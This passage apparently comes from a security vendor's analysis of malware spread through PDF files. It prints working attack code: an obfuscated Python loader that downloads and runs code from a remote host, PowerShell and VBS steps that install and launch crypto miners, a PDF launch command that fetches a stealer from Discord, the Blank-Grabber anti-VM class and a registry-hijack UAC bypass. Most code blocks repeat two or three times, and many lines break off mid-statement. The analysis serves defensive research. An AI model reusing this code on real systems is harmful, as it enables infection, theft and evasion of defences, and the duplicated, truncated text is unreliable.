then executed.\r\nfrom Crypto.Cipher import AES\r\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]]\r\n('dmFyaSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly9zZWFsaW5nc2hvcC5jbGljay9weWVuL2Jvc3RhcjQnKS50ZXh0')))\r\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]](vari)))\r\nimport os import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import requests import json\r\nimport getpass import sys vari = '' exec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]]\r\n('dmFyaSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly9zZWFsaW5nc2hvcC5jbGljay9weWVuL2Jvc3RhcjQnKS50ZXh0')))\r\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]](vari)))\r\nimport os\r\nimport base64\r\nimport sqlite3\r\nimport win32crypt\r\nfrom Crypto.Cipher import AES\r\nimport requests\r\nimport json\r\nimport getpass\r\nimport sys\r\nvari = ''\r\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]]('dmFyaSA9IHJlcXVlc3RzLmdldCgna\r\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]](vari)))\r\nCode 9 – Python Loader.\r\nThis Python file is a Loader that executes dynamically downloaded code. The first  exec  call will download an obfuscated\r\nPython info stealer and Miner dropper and the second  exec  will execute it. This info stealer targets only Chrome and Edge\r\nbrowsers and steals user’s credentials and cookies. In order to retrieve the actual C\u0026C, the malware makes a GET request\r\nand then a POST to  /up/cookie-password-all  with the user’s Personal Identifiable Information (PII).\r\nFigure 11 - Actual C\u0026C.\r\nFigure 11 – Actual C\u0026C.\r\nFor “closing”, the malware makes two last GET requests to retrieve the actual URL for the miners to drop. Using\r\nPowerShell commands, downloads unzips and executes the miners.\r\nos.system('cmd /c mkdir \"C:\\\\Users\\\\Public\\\\PublicAlbums\"')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 10 of 32\n\nos.system(\"powershell.exe -windowstyle hidden Invoke-WebRequest -URI \" + url_miner_xmrig + \" -OutFile\r\nC:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.zip\")\r\nos.system(\"powershell.exe -windowstyle hidden Expand-Archive C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.zip -\r\nDestinationPath C:\\\\Users\\\\Public\\\\PublicAlbums\")\r\nos.system(\"cmd /c C:\\\\Users\\\\Public\\\\PublicAlbums\\\\config.vbs\")\r\nos.system('cmd /c mkdir \"C:\\\\Users\\\\Public\\\\PublicAlbums\"') os.system(\"powershell.exe -windowstyle hidden Invoke-WebRequest -URI \" + url_miner_xmrig + \" -OutFile C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.zip\")\r\nos.system(\"powershell.exe -windowstyle hidden Expand-Archive C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.zip -\r\nDestinationPath C:\\\\Users\\\\Public\\\\PublicAlbums\") os.system(\"cmd /c C:\\\\Users\\\\Public\\\\PublicAlbums\\\\config.vbs\")\r\nos.system('cmd /c mkdir \"C:\\\\Users\\\\Public\\\\PublicAlbums\"')\r\nos.system(\"powershell.exe -windowstyle hidden Invoke-WebRequest -URI \" + url_miner_xmrig + \" -OutFile C:\\\\User\r\nos.system(\"powershell.exe -windowstyle hidden Expand-Archive C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.zip -Desti\r\nos.system(\"cmd /c C:\\\\Users\\\\Public\\\\PublicAlbums\\\\config.vbs\")\r\nCode 10 – The same code is used for Lol Miner.\r\nBoth of the miners are stored in Gitlab (@topworld20241), and both of the ZIP archives contain the file to be\r\nexecuted  config.vbs  with the instructions and configuration of each miner.\r\nFigure 12 - Malicious Gitlab project. (All commits\r\nat GMT+1 timezone)\r\nFigure 12 – Malicious Gitlab project. (All commits at GMT+1 timezone)\r\nSet WShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nIf objFSO.FileExists(\"C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.exe\") Then\r\nWShell.Run \"C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -u\r\nZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV\r\n-p workerbot -a rx/0 -k\", 0\r\nSub Main() Dim WShell,objFSO Set WShell = CreateObject(\"WScript.Shell\") Set objFSO =\r\nCreateObject(\"Scripting.FileSystemObject\") If objFSO.FileExists(\"C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.exe\") Then\r\nWShell.Run \"C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -u\r\nZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV\r\n-p workerbot -a rx/0 -k\", 0 Set WShell = Nothing End If End Sub On Error Resume Next Main\r\nSub Main()\r\nDim WShell,objFSO\r\nSet WShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nIf objFSO.FileExists(\"C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.exe\") Then\r\n WShell.Run \"C:\\\\Users\\\\Public\\\\PublicAlbums\\\\xmrig.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -\r\n Set WShell = Nothing\r\nEnd If\r\nEnd Sub\r\nOn Error Resume Next\r\n Main\r\nCode 11 – VB script for XMRig Miner.\r\nSet WShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nIf objFSO.FileExists(\"C:\\\\Users\\\\Public\\\\PublicSounds\\\\lolMiner.exe\") Then\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 11 of 32\n\nWShell.Run \"C:\\\\Users\\\\Public\\\\PublicSounds\\\\lolMiner.exe --algo NEXA --pool\r\nstratum+ssl://nexapow.unmineable.com:4444 --user\r\nZEPH:ZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV\r\n--watchdog exit !EXTRAPARAMETERS!\", 0\r\nSub Main() Dim WShell,objFSO Set WShell = CreateObject(\"WScript.Shell\") Set objFSO =\r\nCreateObject(\"Scripting.FileSystemObject\") If objFSO.FileExists(\"C:\\\\Users\\\\Public\\\\PublicSounds\\\\lolMiner.exe\") Then\r\nWShell.Run \"C:\\\\Users\\\\Public\\\\PublicSounds\\\\lolMiner.exe --algo NEXA --pool\r\nstratum+ssl://nexapow.unmineable.com:4444 --user\r\nZEPH:ZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV\r\n--watchdog exit !EXTRAPARAMETERS!\", 0 Set WShell = Nothing End If End Sub On Error Resume Next Main\r\nSub Main()\r\nDim WShell,objFSO\r\nSet WShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nIf objFSO.FileExists(\"C:\\\\Users\\\\Public\\\\PublicSounds\\\\lolMiner.exe\") Then\r\n WShell.Run \"C:\\\\Users\\\\Public\\\\PublicSounds\\\\lolMiner.exe --algo NEXA --pool stratum+ssl://nexapow.unminea\r\n Set WShell = Nothing\r\nEnd If\r\nEnd Sub\r\nOn Error Resume Next\r\n Main\r\nCode 12 – VB script for Lol Miner.\r\nCase III. Python Stealer with Low Detection\r\nAnother way of delivering the malicious end file could be more direct, such as downloading the malicious file from\r\nDiscordApp and executing it. This was the case with the below PDF infection chain downloading a malicious Python file.\r\nFigure 13 - Blank-Grabber low detection rate\r\nFigure 13 – Blank-Grabber low detection rate\r\nPython files are not the usual suspects, which is testified even by the low detection rate; even more shocking is that this\r\nPython stealer is an open-source project called Blank-Grabber and not a newly discovered malware.\r\nCampaign Technical Analysis\r\nThe PDF executes PowerShell and downloads the malicious file from DiscordApp, resulting in a “legitimate” appearing\r\nnetwork traffic. The Python malware is then downloaded as  lol.pyw  and executed on the victim’s machine.\r\n/P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1167576449859993683/1168168071366709278/lol.pyw\\',\r\n\\'lol.pyw\\')\"'\r\nmsd89h2j389uh.bat \u0026@echo timeout\r\nmsd89h2j389uh.bat \u0026@echo start stub.pyw\r\n/OpenAction \u003c\u003c /S /Launch /Win \u003c\u003c /F (CMD) /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1167576449859993683/1168168071366709278/lol.pyw\\',\r\n\\'lol.pyw\\')\"' \u003e\u003e msd89h2j389uh.bat \u0026@echo timeout / t 5 \u003e\u003e msd89h2j389uh.bat \u0026@echo start stub.pyw \u003e\u003e\r\n /OpenAction\r\n \u003c\u003c\r\n /S /Launch\r\n /Win\r\n \u003c\u003c\r\n /F (CMD)\r\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://c\r\n \u003e\u003e\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 12 of 32\n\nmsd89h2j389uh.bat \u0026@echo timeout\r\n / t 5\r\n \u003e\u003e\r\n msd89h2j389uh.bat \u0026@echo start stub.pyw\r\n \u003e\u003e\r\nCode 13 – PDF executed command.\r\nThe malware is functional and possesses many features, from a Graphical Builder to UAC Bypass, Anti VM, and stealing\r\ncapabilities from various browsers and applications.\r\nFigure 14 - Features as listed on the GitHub\r\nproject.\r\nFigure 14 – Features as listed on the GitHub project.\r\nWhat is interesting to see is the  class VmProtect , which lists all the anti-VM techniques.\r\nFrom identifying known:\r\n1. UUIDs,\r\n2. Computer names\r\n3. Users names\r\n4. Registry key \u0026 values\r\n5. killing running tasks related to Virtual machines or any other malware-reversing related tools.\r\n6. Making Internet-related checks regarding the emulation of the network and checking if the system is hosted online.\r\nBLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-0806-3C0700080009',\r\n'03DE0294-0480-05DE-1A06-350700080009', '11111111-2222-3333-4444-555555555555', '6F3CA5EC-BEC9-4A4D-8274-11168F640058', 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548', '4C4C4544-0050-3710-8058-CAC04F59344A',\r\n'00000000-0000-0000-0000-AC1F6BD04972', '00000000-0000-0000-0000-000000000000', '5BD24D56-789F-8468-7CDC-CAA7222CC121', '49434D53-0200-9065-2500-65902500E439', '49434D53-0200-9036-2500-36902500F022', '777D84B3-\r\n88D1-451C-93E4-D235177420A7', '49434D53-0200-9036-2500-369025000C65', 'B1112042-52E8-E25B-3655-\r\n6A4F54155DBF', '00000000-0000-0000-0000-AC1F6BD048FE', 'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\r\n'A15A930C-8251-9645-AF63-E45AD728C20C', '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3', 'C7D23342-A5D4-\r\n68A1-59AC-CF40F735B363', '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', '44B94D56-65AB-DC02-86A0-\r\n98143A7423BF', '6608003F-ECE4-494E-B07E-1C4615D1D93C', 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\r\n'49434D53-0200-9036-2500-369025003AF0', '8B4E8278-525C-7343-B825-280AEBCD3BCB', '4D4DDC94-E06C-44F4-\r\n95FE-33A1ADA5AC27', '79AF5279-16CF-4094-9758-F88A616D81B4', 'FE822042-A70C-D08B-F1D1-C207055A488F',\r\n'76122042-C286-FA81-F0A8-514CC507B250', '481E2042-A1AF-D390-CE06-A8F783B1E76A', 'F3988356-32F5-4AE1-\r\n8D47-FD3B8BAFBD4C', '9961A120-E691-4FFE-B67B-F0E4115D5919')\r\nBLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',\r\n'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb', 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc', 'desktop-b0t93d6',\r\n'desktop-1pykp29', 'desktop-1y2433r', 'wileypc', 'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs', 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc', 'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076', 'desktop-vkeons4', 'NTT-EFF-2W11WSS')\r\nBLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfevzx',\r\n'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a', 'lmvwjj9b',\r\n'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm')\r\nBLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv', 'vboxtray',\r\n'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice', 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg',\r\n'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol', 'ksdumperclient', 'ksdumper', 'joeboxserver',\r\n'vmwareservice', 'vmwaretray', 'discordtokenprotector')\r\nLogger.info('Checking UUID')\r\nuuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()\r\n[2].decode(errors='ignore').strip()\r\nreturn uuid in VmProtect.BLACKLISTED_UUIDS\r\ndef checkComputerName() -\u003e bool:\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 13 of 32\n\nLogger.info('Checking computer name')\r\ncomputername = os.getenv('computername')\r\nreturn computername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\r\ndef checkUsers() -\u003e bool:\r\nLogger.info('Checking username')\r\nreturn user.lower() in VmProtect.BLACKLISTED_USERS\r\ndef checkHosting() -\u003e bool:\r\nLogger.info('Checking if system is hosted online')\r\nhttp = PoolManager(cert_reqs='CERT_NONE')\r\nreturn http.request('GET', 'http://ip-api.com/line/?fields=hosting').data.decode(errors='ignore').strip() == 'true'\r\nLogger.info('Unable to check if system is hosted online')\r\ndef checkHTTPSimulation() -\u003e bool:\r\nLogger.info('Checking if system is simulating connection')\r\nhttp = PoolManager(cert_reqs='CERT_NONE', timeout=1.0)\r\nhttp.request('GET', f'https://blank-{Utility.GetRandomString()}.in')\r\ndef checkRegistry() -\u003e bool:\r\nLogger.info('Checking registry')\r\nr1 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-\r\nE325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2', capture_output=True, shell=True)\r\nr2 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-\r\nE325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2', capture_output=True, shell=True)\r\ngpucheck = any((x.lower() in subprocess.run('wmic path win32_VideoController get name', capture_output=True,\r\nshell=True).stdout.decode(errors='ignore').splitlines()[2].strip().lower() for x in ('virtualbox', 'vmware')))\r\ndircheck = any([os.path.isdir(path) for path in ('D:\\\\Tools', 'D:\\\\OS2', 'D:\\\\NT3X')])\r\nreturn r1.returncode != 1 and r2.returncode != 1 or gpucheck or dircheck\r\nUtility.TaskKill(*VmProtect.BLACKLISTED_TASKS)\r\nLogger.info('Checking if system is a VM')\r\nThread(target=VmProtect.killTasks, daemon=True).start()\r\nresult = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or VmProtect.checkComputerName() or\r\nVmProtect.checkUsers() or VmProtect.checkHosting() or VmProtect.checkRegistry()\r\nLogger.info('System is a VM')\r\nLogger.info('System is not a VM')\r\nclass VmProtect: BLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-\r\n0806-3C0700080009', '03DE0294-0480-05DE-1A06-350700080009', '11111111-2222-3333-4444-555555555555',\r\n'6F3CA5EC-BEC9-4A4D-8274-11168F640058', 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548', '4C4C4544-0050-\r\n3710-8058-CAC04F59344A', '00000000-0000-0000-0000-AC1F6BD04972', '00000000-0000-0000-0000-000000000000',\r\n'5BD24D56-789F-8468-7CDC-CAA7222CC121', '49434D53-0200-9065-2500-65902500E439', '49434D53-0200-9036-\r\n2500-36902500F022', '777D84B3-88D1-451C-93E4-D235177420A7', '49434D53-0200-9036-2500-369025000C65',\r\n'B1112042-52E8-E25B-3655-6A4F54155DBF', '00000000-0000-0000-0000-AC1F6BD048FE', 'EB16924B-FB6D-4FA1-\r\n8666-17B91F62FB37', 'A15A930C-8251-9645-AF63-E45AD728C20C', '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\r\n'C7D23342-A5D4-68A1-59AC-CF40F735B363', '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', '44B94D56-65AB-DC02-86A0-98143A7423BF', '6608003F-ECE4-494E-B07E-1C4615D1D93C', 'D9142042-8F51-5EFF-D5F8-\r\nEE9AE3D1602A', '49434D53-0200-9036-2500-369025003AF0', '8B4E8278-525C-7343-B825-280AEBCD3BCB',\r\n'4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27', '79AF5279-16CF-4094-9758-F88A616D81B4', 'FE822042-A70C-D08B-F1D1-C207055A488F', '76122042-C286-FA81-F0A8-514CC507B250', '481E2042-A1AF-D390-CE06-\r\nA8F783B1E76A', 'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C', '9961A120-E691-4FFE-B67B-F0E4115D5919')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 14 of 32\n\nBLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',\r\n'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb', 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc', 'desktop-b0t93d6',\r\n'desktop-1pykp29', 'desktop-1y2433r', 'wileypc', 'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs', 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc', 'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076', 'desktop-vkeons4', 'NTT-EFF-2W11WSS') BLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\r\n'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm',\r\n'w0fjuovmccp5a', 'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm')\r\nBLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv', 'vboxtray',\r\n'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice', 'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg',\r\n'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol', 'ksdumperclient', 'ksdumper', 'joeboxserver',\r\n'vmwareservice', 'vmwaretray', 'discordtokenprotector') @staticmethod def checkUUID() -\u003e bool: Logger.info('Checking\r\nUUID') uuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()\r\n[2].decode(errors='ignore').strip() return uuid in VmProtect.BLACKLISTED_UUIDS @staticmethod def\r\ncheckComputerName() -\u003e bool: Logger.info('Checking computer name') computername = os.getenv('computername') return\r\ncomputername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES @staticmethod def checkUsers() -\u003e bool:\r\nLogger.info('Checking username') user = os.getlogin() return user.lower() in VmProtect.BLACKLISTED_USERS\r\n@staticmethod def checkHosting() -\u003e bool: Logger.info('Checking if system is hosted online') http =\r\nPoolManager(cert_reqs='CERT_NONE') try: return http.request('GET', 'http://ip-api.com/line/?\r\nfields=hosting').data.decode(errors='ignore').strip() == 'true' except Exception: Logger.info('Unable to check if system is\r\nhosted online') return False @staticmethod def checkHTTPSimulation() -\u003e bool: Logger.info('Checking if system is\r\nsimulating connection') http = PoolManager(cert_reqs='CERT_NONE', timeout=1.0) try: http.request('GET', f'https://blank-\r\n{Utility.GetRandomString()}.in') except Exception: return False else: return True @staticmethod def checkRegistry() -\u003e\r\nbool: Logger.info('Checking registry') r1 = subprocess.run('REG QUERY\r\nHKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-\r\n08002BE10318}\\\\0000\\\\DriverDesc 2', capture_output=True, shell=True) r2 = subprocess.run('REG QUERY\r\nHKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-\r\n08002BE10318}\\\\0000\\\\ProviderName 2', capture_output=True, shell=True) gpucheck = any((x.lower() in\r\nsubprocess.run('wmic path win32_VideoController get name', capture_output=True,\r\nshell=True).stdout.decode(errors='ignore').splitlines()[2].strip().lower() for x in ('virtualbox', 'vmware'))) dircheck =\r\nany([os.path.isdir(path) for path in ('D:\\\\Tools', 'D:\\\\OS2', 'D:\\\\NT3X')]) return r1.returncode != 1 and r2.returncode != 1 or\r\ngpucheck or dircheck @staticmethod def killTasks() -\u003e None: Utility.TaskKill(*VmProtect.BLACKLISTED_TASKS)\r\n@staticmethod def isVM() -\u003e bool: Logger.info('Checking if system is a VM') Thread(target=VmProtect.killTasks,\r\ndaemon=True).start() result = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or\r\nVmProtect.checkComputerName() or VmProtect.checkUsers() or VmProtect.checkHosting() or VmProtect.checkRegistry()\r\nif result: Logger.info('System is a VM') else: Logger.info('System is not a VM') return result\r\nclass VmProtect:\r\n BLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-0806-3C0700080009', '03DE\r\n BLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',\r\n BLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfe\r\n BLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5se\r\n @staticmethod\r\n def checkUUID() -\u003e bool:\r\n Logger.info('Checking UUID')\r\n uuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()\r\n return uuid in VmProtect.BLACKLISTED_UUIDS\r\n @staticmethod\r\n def checkComputerName() -\u003e bool:\r\n Logger.info('Checking computer name')\r\n computername = os.getenv('computername')\r\n return computername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\r\n @staticmethod\r\n def checkUsers() -\u003e bool:\r\n Logger.info('Checking username')\r\n user = os.getlogin()\r\n return user.lower() in VmProtect.BLACKLISTED_USERS\r\n @staticmethod\r\n def checkHosting() -\u003e bool:\r\n Logger.info('Checking if system is hosted online')\r\n http = PoolManager(cert_reqs='CERT_NONE')\r\n try:\r\n return http.request('GET', 'http://ip-api.com/line/?fields=hosting').data.decode(errors='ignore')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 15 of 32\n\nexcept Exception:\r\n Logger.info('Unable to check if system is hosted online')\r\n return False\r\n @staticmethod\r\n def checkHTTPSimulation() -\u003e bool:\r\n Logger.info('Checking if system is simulating connection')\r\n http = PoolManager(cert_reqs='CERT_NONE', timeout=1.0)\r\n try:\r\n http.request('GET', f'https://blank-{Utility.GetRandomString()}.in')\r\n except Exception:\r\n return False\r\n else:\r\n return True\r\n @staticmethod\r\n def checkRegistry() -\u003e bool:\r\n Logger.info('Checking registry')\r\n r1 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E3\r\n r2 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E3\r\n gpucheck = any((x.lower() in subprocess.run('wmic path win32_VideoController get name', capture_output\r\n dircheck = any([os.path.isdir(path) for path in ('D:\\\\Tools', 'D:\\\\OS2', 'D:\\\\NT3X')])\r\n return r1.returncode != 1 and r2.returncode != 1 or gpucheck or dircheck\r\n @staticmethod\r\n def killTasks() -\u003e None:\r\n Utility.TaskKill(*VmProtect.BLACKLISTED_TASKS)\r\n @staticmethod\r\n def isVM() -\u003e bool:\r\n Logger.info('Checking if system is a VM')\r\n Thread(target=VmProtect.killTasks, daemon=True).start()\r\n result = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or VmProtect.checkComputerName() or\r\n if result:\r\n Logger.info('System is a VM')\r\n else:\r\n Logger.info('System is not a VM')\r\n return result\r\nCode 14 – VM protect class.\r\nAnother interesting part is the function, which results in UAC bypass,  def UACbypass .\r\ndef UACbypass(method: int=1) -\u003e bool:\r\nexecute = lambda cmd: subprocess.run(cmd, shell=True, capture_output=True)\r\nexecute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f')\r\nexecute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f')\r\nlog_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('computerdefaults --nouacbypass')\r\nlog_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\nif log_count_after \u003e log_count_before:\r\nreturn Utility.UACbypass(method + 1)\r\nexecute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f')\r\nexecute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f')\r\nlog_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('fodhelper --nouacbypass')\r\nlog_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout)\r\nexecute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 16 of 32\n\nif log_count_after \u003e log_count_before:\r\nreturn Utility.UACbypass(method + 1)\r\n@staticmethod def UACbypass(method: int=1) -\u003e bool: if Utility.GetSelf()[1]: execute = lambda cmd: subprocess.run(cmd,\r\nshell=True, capture_output=True) match method: case 1: execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f') execute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f') log_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout) execute('computerdefaults --nouacbypass') log_count_after =\r\nlen(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout) execute('reg delete\r\nhkcu\\\\Software\\\\Classes\\\\ms-settings /f') if log_count_after \u003e log_count_before: return Utility.UACbypass(method + 1) case\r\n2: execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.executable}\" /f') execute('reg add\r\nhkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateExecute\" /f') log_count_before =\r\nlen(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\" /f:text').stdout) execute('fodhelper --\r\nnouacbypass') log_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\"\r\n/f:text').stdout) execute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f') if log_count_after \u003e log_count_before: return\r\nUtility.UACbypass(method + 1) case _: return False return True\r\n @staticmethod\r\n def 